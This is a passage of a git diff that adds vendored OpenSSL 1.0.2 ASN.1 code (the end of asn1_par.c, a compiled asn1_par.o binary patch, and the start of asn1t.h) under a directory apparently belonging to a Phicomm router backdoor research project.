+        j = ASN1_get_object(&p, &len, &tag, &xclass, length);
+#ifdef LINT
+        j = j;
+#endif
+        if (j & 0x80) {
+            if (BIO_write(bp, "Error in encoding\n", 18) <= 0)
+                goto end;
+            ret = 0;
+            goto end;
+        }
+        hl = (p - op);
+        length -= hl;
+        /*
+         * if j == 0x21 it is a constructed indefinite length object
+         */
+        if (BIO_printf(bp, "%5ld:", (long)offset + (long)(op - *pp))
+            <= 0)
+            goto end;
+
+        if (j != (V_ASN1_CONSTRUCTED | 1)) {
+            if (BIO_printf(bp, "d=%-2d hl=%ld l=%4ld ",
+                           depth, (long)hl, len) <= 0)
+                goto end;
+        } else {
+            if (BIO_printf(bp, "d=%-2d hl=%ld l=inf  ", depth, (long)hl) <= 0)
+                goto end;
+        }
+        if (!asn1_print_info(bp, tag, xclass, j, (indent) ? depth : 0))
+            goto end;
+        if (j & V_ASN1_CONSTRUCTED) {
+            ep = p + len;
+            if (BIO_write(bp, "\n", 1) <= 0)
+                goto end;
+            if (len > length) {
+                BIO_printf(bp, "length is greater than %ld\n", length);
+                ret = 0;
+                goto end;
+            }
+            if ((j == 0x21) && (len == 0)) {
+                for (;;) {
+                    r = asn1_parse2(bp, &p, (long)(tot - p),
+                                    offset + (p - *pp), depth + 1,
+                                    indent, dump);
+                    if (r == 0) {
+                        ret = 0;
+                        goto end;
+                    }
+                    if ((r == 2) || (p >= tot))
+                        break;
+                }
+            } else
+                while (p < ep) {
+                    r = asn1_parse2(bp, &p, (long)len,
+                                    offset + (p - *pp), depth + 1,
+                                    indent, dump);
+                    if (r == 0) {
+                        ret = 0;
+                        goto end;
+                    }
+                }
+        } else if (xclass != 0) {
+            p += len;
+            if (BIO_write(bp, "\n", 1) <= 0)
+                goto end;
+        } else {
+            nl = 0;
+            if ((tag == V_ASN1_PRINTABLESTRING) ||
+                (tag == V_ASN1_T61STRING) ||
+                (tag == V_ASN1_IA5STRING) ||
+                (tag == V_ASN1_VISIBLESTRING) ||
+                (tag == V_ASN1_NUMERICSTRING) ||
+                (tag == V_ASN1_UTF8STRING) ||
+                (tag == V_ASN1_UTCTIME) || (tag == V_ASN1_GENERALIZEDTIME)) {
+                if (BIO_write(bp, ":", 1) <= 0)
+                    goto end;
+                if ((len > 0) && BIO_write(bp, (const char *)p, (int)len)
+                    != (int)len)
+                    goto end;
+            } else if (tag == V_ASN1_OBJECT) {
+                opp = op;
+                if (d2i_ASN1_OBJECT(&o, &opp, len + hl) != NULL) {
+                    if (BIO_write(bp, ":", 1) <= 0)
+                        goto end;
+                    i2a_ASN1_OBJECT(bp, o);
+                } else {
+                    if (BIO_write(bp, ":BAD OBJECT", 11) <= 0)
+                        goto end;
+                }
+            } else if (tag == V_ASN1_BOOLEAN) {
+                int ii;
+
+                opp = op;
+                ii = d2i_ASN1_BOOLEAN(NULL, &opp, len + hl);
+                if (ii < 0) {
+                    if (BIO_write(bp, "Bad boolean\n", 12) <= 0)
+                        goto end;
+                }
+                BIO_printf(bp, ":%d", ii);
+            } else if (tag == V_ASN1_BMPSTRING) {
+                /* do the BMP thang */
+            } else if (tag == V_ASN1_OCTET_STRING) {
+                int i, printable = 1;
+
+                opp = op;
+                os = d2i_ASN1_OCTET_STRING(NULL, &opp, len + hl);
+                if (os != NULL && os->length > 0) {
+                    opp = os->data;
+                    /*
+                     * testing whether the octet string is printable
+                     */
+                    for (i = 0; i < os->length; i++) {
+                        if (((opp[i] < ' ') &&
+                             (opp[i] != '\n') &&
+                             (opp[i] != '\r') &&
+                             (opp[i] != '\t')) || (opp[i] > '~')) {
+                            printable = 0;
+                            break;
+                        }
+                    }
+                    if (printable)
+                        /* printable string */
+                    {
+                        if (BIO_write(bp, ":", 1) <= 0)
+                            goto end;
+                        if (BIO_write(bp, (const char *)opp, os->length) <= 0)
+                            goto end;
+                    } else if (!dump)
+                        /*
+                         * not printable => print octet string as hex dump
+                         */
+                    {
+                        if (BIO_write(bp, "[HEX DUMP]:", 11) <= 0)
+                            goto end;
+                        for (i = 0; i < os->length; i++) {
+                            if (BIO_printf(bp, "%02X", opp[i]) <= 0)
+                                goto end;
+                        }
+                    } else
+                        /* print the normal dump */
+                    {
+                        if (!nl) {
+                            if (BIO_write(bp, "\n", 1) <= 0)
+                                goto end;
+                        }
+                        if (BIO_dump_indent(bp,
+                                            (const char *)opp,
+                                            ((dump == -1 || dump >
+                                              os->
+                                              length) ? os->length : dump),
+                                            dump_indent) <= 0)
+                            goto end;
+                        nl = 1;
+                    }
+                }
+                if (os != NULL) {
+                    M_ASN1_OCTET_STRING_free(os);
+                    os = NULL;
+                }
+            } else if (tag == V_ASN1_INTEGER) {
+                ASN1_INTEGER *bs;
+                int i;
+
+                opp = op;
+                bs = d2i_ASN1_INTEGER(NULL, &opp, len + hl);
+                if (bs != NULL) {
+                    if (BIO_write(bp, ":", 1) <= 0)
+                        goto end;
+                    if (bs->type == V_ASN1_NEG_INTEGER)
+                        if (BIO_write(bp, "-", 1) <= 0)
+                            goto end;
+                    for (i = 0; i < bs->length; i++) {
+                        if (BIO_printf(bp, "%02X", bs->data[i]) <= 0)
+                            goto end;
+                    }
+                    if (bs->length == 0) {
+                        if (BIO_write(bp, "00", 2) <= 0)
+                            goto end;
+                    }
+                } else {
+                    if (BIO_write(bp, "BAD INTEGER", 11) <= 0)
+                        goto end;
+                }
+                M_ASN1_INTEGER_free(bs);
+            } else if (tag == V_ASN1_ENUMERATED) {
+                ASN1_ENUMERATED *bs;
+                int i;
+
+                opp = op;
+                bs = d2i_ASN1_ENUMERATED(NULL, &opp, len + hl);
+                if (bs != NULL) {
+                    if (BIO_write(bp, ":", 1) <= 0)
+                        goto end;
+                    if (bs->type == V_ASN1_NEG_ENUMERATED)
+                        if (BIO_write(bp, "-", 1) <= 0)
+                            goto end;
+                    for (i = 0; i < bs->length; i++) {
+                        if (BIO_printf(bp, "%02X", bs->data[i]) <= 0)
+                            goto end;
+                    }
+                    if (bs->length == 0) {
+                        if (BIO_write(bp, "00", 2) <= 0)
+                            goto end;
+                    }
+                } else {
+                    if (BIO_write(bp, "BAD ENUMERATED", 11) <= 0)
+                        goto end;
+                }
+                M_ASN1_ENUMERATED_free(bs);
+            } else if (len > 0 && dump) {
+                if (!nl) {
+                    if (BIO_write(bp, "\n", 1) <= 0)
+                        goto end;
+                }
+                if (BIO_dump_indent(bp, (const char *)p,
+                                    ((dump == -1 || dump > len) ? len : dump),
+                                    dump_indent) <= 0)
+                    goto end;
+                nl = 1;
+            }
+
+            if (!nl) {
+                if (BIO_write(bp, "\n", 1) <= 0)
+                    goto end;
+            }
+            p += len;
+            if ((tag == V_ASN1_EOC) && (xclass == 0)) {
+                ret = 2;        /* End of sequence */
+                goto end;
+            }
+        }
+        length -= len;
+    }
+    ret = 1;
+ end:
+    if (o != NULL)
+        ASN1_OBJECT_free(o);
+    if (os != NULL)
+        M_ASN1_OCTET_STRING_free(os);
+    *pp = p;
+    return (ret);
+}
+
+const char *ASN1_tag2str(int tag)
+{
+    static const char *const tag2str[] = {
+        /* 0-4 */
+        "EOC", "BOOLEAN", "INTEGER", "BIT STRING", "OCTET STRING",
+        /* 5-9 */
+        "NULL", "OBJECT", "OBJECT DESCRIPTOR", "EXTERNAL", "REAL",
+        /* 10-13 */
+        "ENUMERATED", "<ASN1 11>", "UTF8STRING", "<ASN1 13>",
+        /* 15-17 */
+        "<ASN1 14>", "<ASN1 15>", "SEQUENCE", "SET",
+        /* 18-20 */
+        "NUMERICSTRING", "PRINTABLESTRING", "T61STRING",
+        /* 21-24 */
+        "VIDEOTEXSTRING", "IA5STRING", "UTCTIME", "GENERALIZEDTIME",
+        /* 25-27 */
+        "GRAPHICSTRING", "VISIBLESTRING", "GENERALSTRING",
+        /* 28-30 */
+        "UNIVERSALSTRING", "<ASN1 29>", "BMPSTRING"
+    };
+
+    if ((tag == V_ASN1_NEG_INTEGER) || (tag == V_ASN1_NEG_ENUMERATED))
+        tag &= ~0x100;
+
+    if (tag < 0 || tag > 30)
+        return "(unknown)";
+    return tag2str[tag];
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_par.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_par.o
new file mode 100644
index 0000000000000000000000000000000000000000..d43bf46503e1abcc0ddec5da75c200f0e6d5259c
GIT binary patch
literal 9464
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
C$kCht

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1t.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1t.h
new file mode 100644
index 0000000..99bc0ee
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1t.h
@@ -0,0 +1,973 @@
+/* asn1t.h */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#ifndef HEADER_ASN1T_H
+# define HEADER_ASN1T_H
+
+# include <stddef.h>
+# include <openssl/e_os2.h>
+# include <openssl/asn1.h>
+
+# ifdef OPENSSL_BUILD_SHLIBCRYPTO
+#  undef OPENSSL_EXTERN
+#  define OPENSSL_EXTERN OPENSSL_EXPORT
+# endif
+
+/* ASN1 template defines, structures and functions */
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifndef OPENSSL_EXPORT_VAR_AS_FUNCTION
+
+/* Macro to obtain ASN1_ADB pointer from a type (only used internally) */
+#  define ASN1_ADB_ptr(iptr) ((const ASN1_ADB *)(iptr))
+
+/* Macros for start and end of ASN1_ITEM definition */
+
+#  define ASN1_ITEM_start(itname) \
+        OPENSSL_GLOBAL const ASN1_ITEM itname##_it = {
+
+#  define ASN1_ITEM_end(itname) \
+                };
+
+# else
+
+/* Macro to obtain ASN1_ADB pointer from a type (only used internally) */
+#  define ASN1_ADB_ptr(iptr) ((const ASN1_ADB *)(iptr()))
+
+/* Macros for start and end of ASN1_ITEM definition */
+
+#  define ASN1_ITEM_start(itname) \
+        const ASN1_ITEM * itname##_it(void) \
+        { \
+                static const ASN1_ITEM local_it = {
+
+#  define ASN1_ITEM_end(itname) \
+                }; \
+        return &local_it; \
+        }
+
+# endif
+
+/* Macros to aid ASN1 template writing */
+
+# define ASN1_ITEM_TEMPLATE(tname) \
+        static const ASN1_TEMPLATE tname##_item_tt
+
+# define ASN1_ITEM_TEMPLATE_END(tname) \
+        ;\
+        ASN1_ITEM_start(tname) \
+                ASN1_ITYPE_PRIMITIVE,\
+                -1,\
+                &tname##_item_tt,\
+                0,\
+                NULL,\
+                0,\
+                #tname \
+        ASN1_ITEM_end(tname)
+
+/* This is a ASN1 type which just embeds a template */
+
+/*-
+ * This pair helps declare a SEQUENCE. We can do:
+ *
+ *      ASN1_SEQUENCE(stname) = {
+ *              ... SEQUENCE components ...
+ *      } ASN1_SEQUENCE_END(stname)
+ *
+ *      This will produce an ASN1_ITEM called stname_it
+ *      for a structure called stname.
+ *
+ *      If you want the same structure but a different
+ *      name then use:
+ *
+ *      ASN1_SEQUENCE(itname) = {
+ *              ... SEQUENCE components ...
+ *      } ASN1_SEQUENCE_END_name(stname, itname)
+ *
+ *      This will create an item called itname_it using
+ *      a structure called stname.
+ */
+
+# define ASN1_SEQUENCE(tname) \
+        static const ASN1_TEMPLATE tname##_seq_tt[]
+
+# define ASN1_SEQUENCE_END(stname) ASN1_SEQUENCE_END_name(stname, stname)
+
+# define ASN1_SEQUENCE_END_name(stname, tname) \
+        ;\
+        ASN1_ITEM_start(tname) \
+                ASN1_ITYPE_SEQUENCE,\
+                V_ASN1_SEQUENCE,\
+                tname##_seq_tt,\
+                sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
+                NULL,\
+                sizeof(stname),\
+                #stname \
+        ASN1_ITEM_end(tname)
+
+# define ASN1_NDEF_SEQUENCE(tname) \
+        ASN1_SEQUENCE(tname)
+
+# define ASN1_NDEF_SEQUENCE_cb(tname, cb) \
+        ASN1_SEQUENCE_cb(tname, cb)
+
+# define ASN1_SEQUENCE_cb(tname, cb) \
+        static const ASN1_AUX tname##_aux = {NULL, 0, 0, 0, cb, 0}; \
+        ASN1_SEQUENCE(tname)
+
+# define ASN1_BROKEN_SEQUENCE(tname) \
+        static const ASN1_AUX tname##_aux = {NULL, ASN1_AFLG_BROKEN, 0, 0, 0, 0}; \
+        ASN1_SEQUENCE(tname)
+
+# define ASN1_SEQUENCE_ref(tname, cb, lck) \
+        static const ASN1_AUX tname##_aux = {NULL, ASN1_AFLG_REFCOUNT, offsetof(tname, references), lck, cb, 0}; \
+        ASN1_SEQUENCE(tname)
+
+# define ASN1_SEQUENCE_enc(tname, enc, cb) \
+        static const ASN1_AUX tname##_aux = {NULL, ASN1_AFLG_ENCODING, 0, 0, cb, offsetof(tname, enc)}; \
+        ASN1_SEQUENCE(tname)
+
+# define ASN1_NDEF_SEQUENCE_END(tname) \
+        ;\
+        ASN1_ITEM_start(tname) \
+                ASN1_ITYPE_NDEF_SEQUENCE,\
+                V_ASN1_SEQUENCE,\
+                tname##_seq_tt,\
+                sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
+                NULL,\
+                sizeof(tname),\
+                #tname \
+        ASN1_ITEM_end(tname)
+
+# define ASN1_BROKEN_SEQUENCE_END(stname) ASN1_SEQUENCE_END_ref(stname, stname)
+
+# define ASN1_SEQUENCE_END_enc(stname, tname) ASN1_SEQUENCE_END_ref(stname, tname)
+
+# define ASN1_SEQUENCE_END_cb(stname, tname) ASN1_SEQUENCE_END_ref(stname, tname)
+
+# define ASN1_SEQUENCE_END_ref(stname, tname) \
+        ;\
+        ASN1_ITEM_start(tname) \
+                ASN1_ITYPE_SEQUENCE,\
+                V_ASN1_SEQUENCE,\
+                tname##_seq_tt,\
+                sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
+                &tname##_aux,\
+                sizeof(stname),\
+                #stname \
+        ASN1_ITEM_end(tname)
+
+# define ASN1_NDEF_SEQUENCE_END_cb(stname, tname) \
+        ;\
+        ASN1_ITEM_start(tname) \
+                ASN1_ITYPE_NDEF_SEQUENCE,\
+                V_ASN1_SEQUENCE,\
+                tname##_seq_tt,\
+                sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
+                &tname##_aux,\
+                sizeof(stname),\
+                #stname \
+        ASN1_ITEM_end(tname)
+
+/*-
+ * This pair helps declare a CHOICE type. We can do:
+ *
+ *      ASN1_CHOICE(chname) = {
+ *              ... CHOICE options ...
+ *      ASN1_CHOICE_END(chname)
+ *
+ *      This will produce an ASN1_ITEM called chname_it
+ *      for a structure called chname. The structure
+ *      definition must look like this:
+ *      typedef struct {
+ *              int type;
+ *              union {
+ *                      ASN1_SOMETHING *opt1;
+ *                      ASN1_SOMEOTHER *opt2;
+ *              } value;
+ *      } chname;
+ *
+ *      the name of the selector must be 'type'.
+ *      to use an alternative selector name use the
+ *      ASN1_CHOICE_END_selector() version.
+ */
+
+# define ASN1_CHOICE(tname) \
+        static const ASN1_TEMPLATE tname##_ch_tt[]
+
+# define ASN1_CHOICE_cb(tname, cb) \
+        static const ASN1_AUX tname##_aux = {NULL, 0, 0, 0, cb, 0}; \
+        ASN1_CHOICE(tname)
+
+# define ASN1_CHOICE_END(stname) ASN1_CHOICE_END_name(stname, stname)
+
+# define ASN1_CHOICE_END_name(stname, tname) ASN1_CHOICE_END_selector(stname, tname, type)
+
+# define ASN1_CHOICE_END_selector(stname, tname, selname) \
+        ;\
+        ASN1_ITEM_start(tname) \
+                ASN1_ITYPE_CHOICE,\
+                offsetof(stname,selname) ,\
+                tname##_ch_tt,\
+                sizeof(tname##_ch_tt) / sizeof(ASN1_TEMPLATE),\
+                NULL,\
+                sizeof(stname),\
+                #stname \
+        ASN1_ITEM_end(tname)
+
+# define ASN1_CHOICE_END_cb(stname, tname, selname) \
+        ;\
+        ASN1_ITEM_start(tname) \
+                ASN1_ITYPE_CHOICE,\
+                offsetof(stname,selname) ,\
+                tname##_ch_tt,\
+                sizeof(tname##_ch_tt) / sizeof(ASN1_TEMPLATE),\
+                &tname##_aux,\
+                sizeof(stname),\
+                #stname \
+        ASN1_ITEM_end(tname)
+
+/* This helps with the template wrapper form of ASN1_ITEM */
+
+# define ASN1_EX_TEMPLATE_TYPE(flags, tag, name, type) { \
+        (flags), (tag), 0,\
+        #name, ASN1_ITEM_ref(type) }
+
+/* These help with SEQUENCE or CHOICE components */
+
+/* used to declare other types */
+
+# define ASN1_EX_TYPE(flags, tag, stname, field, type) { \
+        (flags), (tag), offsetof(stname, field),\
+        #field, ASN1_ITEM_ref(type) }
+
+/* used when the structure is combined with the parent */
+
+# define ASN1_EX_COMBINE(flags, tag, type) { \
+        (flags)|ASN1_TFLG_COMBINE, (tag), 0, NULL, ASN1_ITEM_ref(type) }
+
+/* implicit and explicit helper macros */
+
+# define ASN1_IMP_EX(stname, field, type, tag, ex) \
+                ASN1_EX_TYPE(ASN1_TFLG_IMPLICIT | ex, tag, stname, field, type)
+
+# define ASN1_EXP_EX(stname, field, type, tag, ex) \
+                ASN1_EX_TYPE(ASN1_TFLG_EXPLICIT | ex, tag, stname, field, type)
+
+/* Any defined by macros: the field used is in the table itself */
+
+# ifndef OPENSSL_EXPORT_VAR_AS_FUNCTION
+#  define ASN1_ADB_OBJECT(tblname) { ASN1_TFLG_ADB_OID, -1, 0, #tblname, (const ASN1_ITEM *)&(tblname##_adb) }
+#  define ASN1_ADB_INTEGER(tblname) { ASN1_TFLG_ADB_INT, -1, 0, #tblname, (const ASN1_ITEM *)&(tblname##_adb) }
+# else
+#  define ASN1_ADB_OBJECT(tblname) { ASN1_TFLG_ADB_OID, -1, 0, #tblname, tblname##_adb }
+#  define ASN1_ADB_INTEGER(tblname) { ASN1_TFLG_ADB_INT, -1, 0, #tblname, tblname##_adb }
+# endif
+/* Plain simple type */
+# define ASN1_SIMPLE(stname, field, type) ASN1_EX_TYPE(0,0, stname, field, type)
+
+/* OPTIONAL simple type */
